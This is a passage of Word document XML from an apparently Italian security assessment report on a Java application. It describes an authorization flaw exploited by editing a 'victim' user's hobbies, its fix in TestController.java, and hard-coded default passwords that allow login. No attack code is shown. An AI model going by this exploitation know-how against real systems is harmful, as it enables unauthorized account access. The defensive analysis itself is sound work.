        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C361E4" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778F2BA3" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A89F4D0" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2981BF48" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71940053" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DD61D1" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FE7DE5" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251927552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A2D625F" wp14:editId="1A23CEED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-532130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2628900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7183755" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1033106168"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08F4BEE" w14:textId="677201BF"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8</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25F" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-41.9pt;margin-top:207pt;width:565.6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Ts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ezu6ub+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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="708F4BEE" w14:textId="677201BF"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>8</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Aggiunta hobby per l'utente vittima</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251926528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6AC6099A" wp14:editId="1C9145FD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>232410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7184270" cy="2339340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="17968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46309468" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BA27EE" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109AC09D" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BDBF0C6" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB09613" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147A2EF2" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E67BDCD" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE92AAD" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78171A71" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295E5AF6" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D4573A" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973"/>
    <w:p w14:paraId="242306F7" w14:textId="77777777" w:rsidR="00241973" w:rsidRPr="00ED7083" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED7083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF02BA" w14:textId="19085706" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:r>
        <w:t xml:space="preserve">Per risolvere la vulnerabilità bisogna controllare che l’utente per cui si fanno le modifiche è lo stesso di quello autenticato. Per fare ciò è stato modificata l’API /test in TestController.java inserendo tale controllo mostrata in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tali richieste verranno ora bloccate se si tenta di effettuarle per un altro utente, restituendo la risposta NOT_ACCEPTABLE.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A880F9" w14:textId="3B46121E" w:rsidR="00241973" w:rsidRDefault="00743C4B" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251938816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="392423AF" wp14:editId="30E58DFA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6071520" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="73557456"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379" cy="1600954"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00241973">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251928576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E73D02A" wp14:editId="0C059C99">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>626110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1671320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4867275" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1623687041"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1BDB570" w14:textId="6C2CBACE"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>9</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D02A" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:49.3pt;margin-top:131.6pt;width:383.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C2GwIAAD8EAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L06yN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TfHY7vb3hTFJs9vEm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jMlAthsCAAA/BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEAmyeoj+AAAAAKAQAADwAAAAAAAAAAAAAAAAB1BAAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAIIFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="51BDB570" w14:textId="6C2CBACE"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>9</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: TestController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="59689D68" w14:textId="77777777" w:rsidR="00241973" w:rsidRPr="00F04F57" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6B8D87" w14:textId="784DB884" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4221395A" w14:textId="1E0768B9" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA20C36" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BB3747" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67447974" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F44F1A" w14:textId="77777777" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00241973"/>
    <w:p w14:paraId="0495E807" w14:textId="741E98BB" w:rsidR="00241973" w:rsidRDefault="00241973" w:rsidP="00743C4B"/>
    <w:p w14:paraId="2C646893" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00743C4B"/>
    <w:p w14:paraId="15C7C0A5" w14:textId="02ADC093" w:rsidR="00B63358" w:rsidRPr="00743C4B" w:rsidRDefault="00491A55" w:rsidP="00B63358">
      <w:r w:rsidRPr="00B63358">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hard coded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backend e, se il codice è pubblico, chiunque può accedere a queste password, rendendo la vulnerabilità facilmente sfruttabile. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AB848" w14:textId="003B37D3"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w:t>
      </w:r>
      <w:r w:rsidR="00743C4B">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="007019BC">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00743C4B">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00242251">
        <w:t>, in modo da fare il login con gli utenti creati di default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B43D6C" w14:textId="77777777" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355E5CDF" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF3EE6C" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D064BCA" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09582C74" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30033F45" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791407C2" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48622C2A" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E441488" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D216093" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561FA5FF" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4D4D9C" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A36D3DE" w14:textId="77777777" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A28D04" w14:textId="6EC9E530" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251939840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F4FD13B" wp14:editId="03EE5B8E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-640715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5044440" cy="4508604"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="170649197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86" b="6768"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5044440" cy="450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9669" w14:textId="566BE9CB" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F46495B" w14:textId="4F3A90A1" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484B28C2" w14:textId="450F15F3" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48004EF4" w14:textId="04A06715" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4673D6EA" w14:textId="30393534" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1919F4CF" w14:textId="00B5164C" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61788F0B" w14:textId="2EE5965B" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D33BE2" w14:textId="106C14C1" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C68194" w14:textId="51977C06" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E04167" w14:textId="25D8CC68" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003D5867" w14:textId="5F9DBAF8" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41878C88" w14:textId="60743F13" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED33C22" w14:textId="00F9C313" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4E5A10" w14:textId="1E406992" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D59E4E" w14:textId="60BCD4F7" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057DF4BB" w14:textId="21ADB14B" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F68DFAA" w14:textId="329B3152" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BA2AF2" w14:textId="4AC4E761" w:rsidR="00DA7D75" w:rsidRDefault="00743C4B"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714C21C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>28575</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75EA83C1"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>10</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5" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:2.25pt;width:408.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8Z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ZDadfaKQpNjt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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B3635D7" w14:textId="75EA83C1"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>10</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="004D1ACC">
                        <w:t>UserControllerTest.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA45377" w14:textId="2C9FED52" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD8A770" w14:textId="0797042F" w:rsidR="00DA7D75" w:rsidRDefault="00743C4B" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251940864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="533BA511" wp14:editId="47882C2E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5295900" cy="3718560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="146514484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3109" b="9363"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5295900"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18670" w14:textId="11CA592C" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069E83EF" w14:textId="127AC22F" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9B2F54" w14:textId="5E2D36AA" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739CF506" w14:textId="367E3C0D" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220E2C4B" w14:textId="70E3AAF5" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A43D807" w14:textId="4FC80F50" w:rsidR="00370730" w:rsidRDefault="00370730" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF95FBE" w14:textId="628520AE" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C63D82" w14:textId="3C089CAB" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BED19CF" w14:textId="08BE14F4" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29ED1561" w14:textId="24F79F5A" w:rsidR="00743C4B" w:rsidRDefault="00743C4B" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
